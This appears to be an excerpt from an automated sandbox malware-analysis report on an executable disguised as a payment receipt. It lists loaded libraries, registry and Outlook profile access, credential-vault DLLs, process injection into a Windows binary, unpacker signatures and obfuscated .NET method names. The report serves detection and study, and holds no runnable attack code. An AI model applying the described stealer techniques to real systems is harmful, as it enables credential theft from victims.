                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: dLtX.pdb source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: dLtX.pdbSHA256 source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VfJW2xm7a.exe, 00000010.00000000.2203131007.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp, VfJW2xm7a.exe, 00000012.00000002.4517727575.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: PAYMENT RECEIPT_USD21,000.exe, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: fttQgpyzkkc.exe.0.dr, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.cs.Net Code: iaW4OAEHHB System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.cs.Net Code: iaW4OAEHHB System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.7260000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 10.2.fttQgpyzkkc.exe.303a394.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: 0xF89C5109 [Sun Mar 5 09:25:29 2102 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040D87E push 1DC2154Bh; retf 9_2_0040D889
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004141B8 push edx; retn DDCAh9_2_004141E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00403250 push eax; ret 9_2_00403252
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00419265 push ss; ret 9_2_0041926C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00408269 push cs; retf 9_2_0040826A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00401A95 pushfd ; retf 9_2_00401A9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041839C push 0000002Dh; ret 9_2_0041839F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042D423 push edi; iretd 9_2_0042D42C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414C36 push es; retf 9_2_00414C77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414CA1 push es; iretd 9_2_00414CC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004084A9 push esp; iretd 9_2_004084AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00418572 push esp; retf 9_2_004185E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004185D0 push esp; retf 9_2_004185E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004146F6 push esi; retf B417h9_2_00414778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040D757 push 5E326CF3h; retf 9_2_0040D763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E09AD push ecx; mov dword ptr [esp], ecx9_2_010E09B6
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_073095A0 push esp; retf 10_2_073095A9
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730D088 pushad ; iretd 10_2_0730D095
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730E0FD push FFFFFF8Bh; iretd 10_2_0730E0FF
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730DD61 push ss; ret 10_2_0730DD62
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07309A32 pushfd ; iretd 10_2_07309A39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113C54F push 8B010C67h; ret 15_2_0113C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113C54D pushfd ; ret 15_2_0113C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F09AD push ecx; mov dword ptr [esp], ecx15_2_010F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113C9D7 push edi; ret 15_2_0113C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010C1FEC push eax; iretd 15_2_010C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01147E99 push ecx; ret 15_2_01147EAC
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: section name: .text entropy: 7.582634051585841
                Source: fttQgpyzkkc.exe.0.drStatic PE information: section name: .text entropy: 7.582634051585841
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.csHigh entropy of concatenated method names: 'lnZkYPMdSG', 'tjQkf6wG3D', 'k7Wkhhr2hH', 'DcukloQpAu', 'iDRkKScF8v', 'ujrku8HLW0', 'NFvkRYvl4R', 'l1bkvvfQaf', 'UCtkoyNh1I', 'WNNkgb0wRr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, AneXfQPNEE8YvYRqYq.csHigh entropy of concatenated method names: 'b94IGndDuT', 'DJxIku1YXB', 'o06ITJ4ONC', 'bqZIQhpeqa', 'lpNIx65S4H', 'TuPTKeNToN', 'BUcTuO32Nd', 'JXeTRSuPqE', 'rR6Tv3n39q', 'l2pTo1Ah7B'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, u83HyvHgi0F6Oi2kUP.csHigh entropy of concatenated method names: 'CvemjTuk54QjiXRtkdQ', 'NE1olkudyA1gGFmmuYy', 'ix6xnaupf7JdG4HMStI', 'SnIItfQVnY', 'ss7Ircb6VW', 'sAiIeZl27P', 'k5TKx6utBiXfOSvIwWA', 'hUkoyxuMiD5ITlFV5KW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, mOWlKxqiTOOTTUCo6Y.csHigh entropy of concatenated method names: 'lEJQEnduR4', 'RjbQUjOD2A', 'wLlQO787J0', 'E2ZQb0LmKH', 'DB1QLaCHGn', 'mYDQNooi6C', 'THFQ9PDrS5', 'WusQ6PSmNa', 'M2gQ3QwlTi', 'JIDQ0DrK5m'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, jIJVAXz9H2a6Ch1c4g.csHigh entropy of concatenated method names: 'klveN9gu7q', 'CPAe6ExUwq', 'vBUe3KFPcB', 'JXfePD9TMY', 'hsLeHNc50t', 'Utxe5OFoBc', 'adVe1BSJ5q', 'P2xeSp1yOl', 'pGieEIgBjT', 'anweUscTNb'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, ahWIV1RS9pavR23yV8.csHigh entropy of concatenated method names: 'BJYrsSIxTE', 'Q9qrmAwgls', 'AbHrr74g7y', 'RwErXRlOJK', 'oZPrynNkFR', 'd9ZrSBniEC', 'Dispose', 'VG4tCZxS4H', 'tGUtkYh0XR', 'PSbtDB8cPH'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, O38XpNYSEdntuKrXg4.csHigh entropy of concatenated method names: 'TWlsWgxnTQ', 'Eg9sahEq5O', 'QnDsYgbfcA', 'TdjsfS5j5I', 'ygusHxym7u', 'fKjs7ecVjK', 'HqZs5NnhWP', 'gXXs1xlKM6', 'FrNsVYwqG2', 'Xm8scTuDWV'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, Y7vEqcjLD9rUht9AA2.csHigh entropy of concatenated method names: 'z7yJ6s2n5k', 'wr0J37E6OE', 'EymJPaoIoW', 'qQtJHqpiXY', 'BVTJ5Umg6w', 'v5cJ1iOto3', 'tmiJcdsRYT', 'PhSJAZCdpc', 'rI9JWNps2u', 'jGaJFttHYX'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, Vll9ulcHUBKWIKcZSl.csHigh entropy of concatenated method names: 'Q1RQCYbByx', 'UQeQD9OUFF', 'EjMQIfO5Ty', 'uOtIgwsRfY', 'M8HIzNouNP', 'u1ZQipa2sk', 'vxNQd26Rnx', 'iWvQwYUrID', 'F6RQ2fh0sB', 'yDfQ4kSnEe'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, LYPZ4R3pGAHH4YQwgA.csHigh entropy of concatenated method names: 'bByDbfvT9t', 'tl5DN7awsj', 'gFrD6QWtBQ', 'Md8D3HX4kb', 'uGQDsK0Qar', 'KC5D86TXr6', 'XmoDmKWgRL', 'z1HDtmBPbF', 'PBlDr3ybkA', 'KKoDef1ni9'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, MoGqTF0De7oYCQoCBs.csHigh entropy of concatenated method names: 'HXlTLUeYuW', 'Gd9T9y7DSN', 'B1mD7VL70D', 'w4ZD5dLLgc', 'K8tD1OjiRS', 'X5lDVZo7Bf', 'wJbDcFShZ6', 'DhnDAos8HP', 'AdADqDSXuJ', 'm2qDW6LNU2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, H18ZtFd4b4wjKjHmVS3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cMGBrLOuL4', 'u8yBeEQr75', 'IkpBXccYOc', 'JtJBBgtJt3', 'Jn4By4lCrx', 'tSiBnRmRjI', 'QeiBS073MS'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, oSjAY1lhF1GC5SIquF.csHigh entropy of concatenated method names: 'FGhmMQW6vy', 'HxgmZrrNc1', 'ToString', 'WgsmCIAJ2p', 'mKUmkv1upk', 'VwUmD9byx6', 'QMLmTEpYUy', 'FAcmIXkDV0', 'AsKmQFoBW1', 'ffSmxNqgtF'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, VK9UFuhDVeFXxXgkpl.csHigh entropy of concatenated method names: 'ToString', 'ncE8FmVDVW', 'fKi8HI5KZ7', 'UMM873U9Jm', 'wpY85EcSqV', 'LXj81t3brv', 'A3o8VFxTjZ', 'xqJ8cvPMeM', 'gbc8AAR6xR', 'UyN8qJGGGr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, L731PFwBlaHCpoRhA0.csHigh entropy of concatenated method names: 'vryO39aA0', 'gEFbaNsQh', 'BncN6ASv0', 'TbO9fkr8Y', 'IW53q2cqE', 'pH40xAy9e', 'wTV1HWZDAYxs0R6iOg', 'PvpefnIcsUo38JBceu', 'j78aRpgBbYoJOr1ni6', 'p8kt2SWnW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, zqu2o5udpaX1dAojgq.csHigh entropy of concatenated method names: 'ksXmvvB2YJ', 'Atgmg7Xuws', 'J96tipDQIJ', 'tlxtdsKbSG', 'oQvmFY78G3', 'xnZmassIkh', 'lkVmjmeuc9', 'oJAmYNhgGQ', 'p2Smf61c6p', 'O8amhToXlA'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, uQNTqjddnblywa3ZD0i.csHigh entropy of concatenated method names: 'N8PegaK8l3', 'JCJezY1m1g', 'ADiXiCEpSt', 'I19XdZ2Z3r', 'kAPXwhPwTb', 'glPX2lkLIQ', 'xCBX4tAPLE', 's93XGJtVoy', 'D47XC8ShGI', 'FetXkMfJvC'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.csHigh entropy of concatenated method names: 'Ttk2GApPwd', 'Led2CmXgkR', 'KEt2kGjoKh', 'MbX2DfHKtM', 'RbU2TlXVyG', 'dct2ILk6Vx', 'ysq2QyBMpt', 'gDQ2xbDLcZ', 'xRV2pBGITp', 'Kib2MeBrKP'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, RMVsIED7C1wyR52SMG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XI7woQ9R3y', 'G1gwgahHW4', 'C0Bwz5YxpX', 'bYl2i54Pnj', 'wP52djSn0v', 'JAI2wA9lJK', 'qpY22ZH47r', 'KOHg6Fjm2SPhbL1CcB3'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, H1W8MGk0b3dbYKruaD.csHigh entropy of concatenated method names: 'Dispose', 'lavdoR23yV', 'IhKwHqohwU', 'eMT7Mekk8a', 'pULdgGaeIw', 'Ir4dzOlYX6', 'ProcessDialogKey', 'abPwiuWZlZ', 'KyTwdGaP4D', 'f91ww2ctcD'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, EB6CrldivkvLqGOS5Ic.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'R3leF7JJfp', 'siFeabRRuo', 'LgoejyyG9t', 'o0YeYigSyQ', 'jbHefydsvF', 'Hm2ehNT28m', 'RHPel3kWiU'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, xKCmdn4pHsdy1wvAJp.csHigh entropy of concatenated method names: 'xyHdQikDqR', 'Y4UdxGrElt', 'WpGdMAHH4Y', 'jwgdZAqoGq', 'joCdsBsbne', 'tfQd8NEE8Y', 'EPQ7Zxv7pgMhIWeTxs', 'NCM7BQHUFPPChoOXy0', 'MonddSaSnN', 'Ahtd2xqQrx'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GuWZlZoVyTGaP4DC91.csHigh entropy of concatenated method names: 'yr0rPZ7war', 'qCDrHV0nG2', 'A1Er7Isk5c', 'zRfr5f8R3H', 'pWQr15UB8Y', 'kuIrVHtBrB', 'AZArcnIrnv', 'gsYrAWug18', 'CGDrqDrj3N', 'w7irWqIvS2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.csHigh entropy of concatenated method names: 'lnZkYPMdSG', 'tjQkf6wG3D', 'k7Wkhhr2hH', 'DcukloQpAu', 'iDRkKScF8v', 'ujrku8HLW0', 'NFvkRYvl4R', 'l1bkvvfQaf', 'UCtkoyNh1I', 'WNNkgb0wRr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, AneXfQPNEE8YvYRqYq.csHigh entropy of concatenated method names: 'b94IGndDuT', 'DJxIku1YXB', 'o06ITJ4ONC', 'bqZIQhpeqa', 'lpNIx65S4H', 'TuPTKeNToN', 'BUcTuO32Nd', 'JXeTRSuPqE', 'rR6Tv3n39q', 'l2pTo1Ah7B'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, u83HyvHgi0F6Oi2kUP.csHigh entropy of concatenated method names: 'CvemjTuk54QjiXRtkdQ', 'NE1olkudyA1gGFmmuYy', 'ix6xnaupf7JdG4HMStI', 'SnIItfQVnY', 'ss7Ircb6VW', 'sAiIeZl27P', 'k5TKx6utBiXfOSvIwWA', 'hUkoyxuMiD5ITlFV5KW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, mOWlKxqiTOOTTUCo6Y.csHigh entropy of concatenated method names: 'lEJQEnduR4', 'RjbQUjOD2A', 'wLlQO787J0', 'E2ZQb0LmKH', 'DB1QLaCHGn', 'mYDQNooi6C', 'THFQ9PDrS5', 'WusQ6PSmNa', 'M2gQ3QwlTi', 'JIDQ0DrK5m'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, jIJVAXz9H2a6Ch1c4g.csHigh entropy of concatenated method names: 'klveN9gu7q', 'CPAe6ExUwq', 'vBUe3KFPcB', 'JXfePD9TMY', 'hsLeHNc50t', 'Utxe5OFoBc', 'adVe1BSJ5q', 'P2xeSp1yOl', 'pGieEIgBjT', 'anweUscTNb'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, ahWIV1RS9pavR23yV8.csHigh entropy of concatenated method names: 'BJYrsSIxTE', 'Q9qrmAwgls', 'AbHrr74g7y', 'RwErXRlOJK', 'oZPrynNkFR', 'd9ZrSBniEC', 'Dispose', 'VG4tCZxS4H', 'tGUtkYh0XR', 'PSbtDB8cPH'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, O38XpNYSEdntuKrXg4.csHigh entropy of concatenated method names: 'TWlsWgxnTQ', 'Eg9sahEq5O', 'QnDsYgbfcA', 'TdjsfS5j5I', 'ygusHxym7u', 'fKjs7ecVjK', 'HqZs5NnhWP', 'gXXs1xlKM6', 'FrNsVYwqG2', 'Xm8scTuDWV'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, Y7vEqcjLD9rUht9AA2.csHigh entropy of concatenated method names: 'z7yJ6s2n5k', 'wr0J37E6OE', 'EymJPaoIoW', 'qQtJHqpiXY', 'BVTJ5Umg6w', 'v5cJ1iOto3', 'tmiJcdsRYT', 'PhSJAZCdpc', 'rI9JWNps2u', 'jGaJFttHYX'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, Vll9ulcHUBKWIKcZSl.csHigh entropy of concatenated method names: 'Q1RQCYbByx', 'UQeQD9OUFF', 'EjMQIfO5Ty', 'uOtIgwsRfY', 'M8HIzNouNP', 'u1ZQipa2sk', 'vxNQd26Rnx', 'iWvQwYUrID', 'F6RQ2fh0sB', 'yDfQ4kSnEe'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, LYPZ4R3pGAHH4YQwgA.csHigh entropy of concatenated method names: 'bByDbfvT9t', 'tl5DN7awsj', 'gFrD6QWtBQ', 'Md8D3HX4kb', 'uGQDsK0Qar', 'KC5D86TXr6', 'XmoDmKWgRL', 'z1HDtmBPbF', 'PBlDr3ybkA', 'KKoDef1ni9'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, MoGqTF0De7oYCQoCBs.csHigh entropy of concatenated method names: 'HXlTLUeYuW', 'Gd9T9y7DSN', 'B1mD7VL70D', 'w4ZD5dLLgc', 'K8tD1OjiRS', 'X5lDVZo7Bf', 'wJbDcFShZ6', 'DhnDAos8HP', 'AdADqDSXuJ', 'm2qDW6LNU2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, H18ZtFd4b4wjKjHmVS3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cMGBrLOuL4', 'u8yBeEQr75', 'IkpBXccYOc', 'JtJBBgtJt3', 'Jn4By4lCrx', 'tSiBnRmRjI', 'QeiBS073MS'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, oSjAY1lhF1GC5SIquF.csHigh entropy of concatenated method names: 'FGhmMQW6vy', 'HxgmZrrNc1', 'ToString', 'WgsmCIAJ2p', 'mKUmkv1upk', 'VwUmD9byx6', 'QMLmTEpYUy', 'FAcmIXkDV0', 'AsKmQFoBW1', 'ffSmxNqgtF'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, VK9UFuhDVeFXxXgkpl.csHigh entropy of concatenated method names: 'ToString', 'ncE8FmVDVW', 'fKi8HI5KZ7', 'UMM873U9Jm', 'wpY85EcSqV', 'LXj81t3brv', 'A3o8VFxTjZ', 'xqJ8cvPMeM', 'gbc8AAR6xR', 'UyN8qJGGGr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, L731PFwBlaHCpoRhA0.csHigh entropy of concatenated method names: 'vryO39aA0', 'gEFbaNsQh', 'BncN6ASv0', 'TbO9fkr8Y', 'IW53q2cqE', 'pH40xAy9e', 'wTV1HWZDAYxs0R6iOg', 'PvpefnIcsUo38JBceu', 'j78aRpgBbYoJOr1ni6', 'p8kt2SWnW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, zqu2o5udpaX1dAojgq.csHigh entropy of concatenated method names: 'ksXmvvB2YJ', 'Atgmg7Xuws', 'J96tipDQIJ', 'tlxtdsKbSG', 'oQvmFY78G3', 'xnZmassIkh', 'lkVmjmeuc9', 'oJAmYNhgGQ', 'p2Smf61c6p', 'O8amhToXlA'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, uQNTqjddnblywa3ZD0i.csHigh entropy of concatenated method names: 'N8PegaK8l3', 'JCJezY1m1g', 'ADiXiCEpSt', 'I19XdZ2Z3r', 'kAPXwhPwTb', 'glPX2lkLIQ', 'xCBX4tAPLE', 's93XGJtVoy', 'D47XC8ShGI', 'FetXkMfJvC'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.csHigh entropy of concatenated method names: 'Ttk2GApPwd', 'Led2CmXgkR', 'KEt2kGjoKh', 'MbX2DfHKtM', 'RbU2TlXVyG', 'dct2ILk6Vx', 'ysq2QyBMpt', 'gDQ2xbDLcZ', 'xRV2pBGITp', 'Kib2MeBrKP'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, RMVsIED7C1wyR52SMG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XI7woQ9R3y', 'G1gwgahHW4', 'C0Bwz5YxpX', 'bYl2i54Pnj', 'wP52djSn0v', 'JAI2wA9lJK', 'qpY22ZH47r', 'KOHg6Fjm2SPhbL1CcB3'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, H1W8MGk0b3dbYKruaD.csHigh entropy of concatenated method names: 'Dispose', 'lavdoR23yV', 'IhKwHqohwU', 'eMT7Mekk8a', 'pULdgGaeIw', 'Ir4dzOlYX6', 'ProcessDialogKey', 'abPwiuWZlZ', 'KyTwdGaP4D', 'f91ww2ctcD'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, EB6CrldivkvLqGOS5Ic.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'R3leF7JJfp', 'siFeabRRuo', 'LgoejyyG9t', 'o0YeYigSyQ', 'jbHefydsvF', 'Hm2ehNT28m', 'RHPel3kWiU'
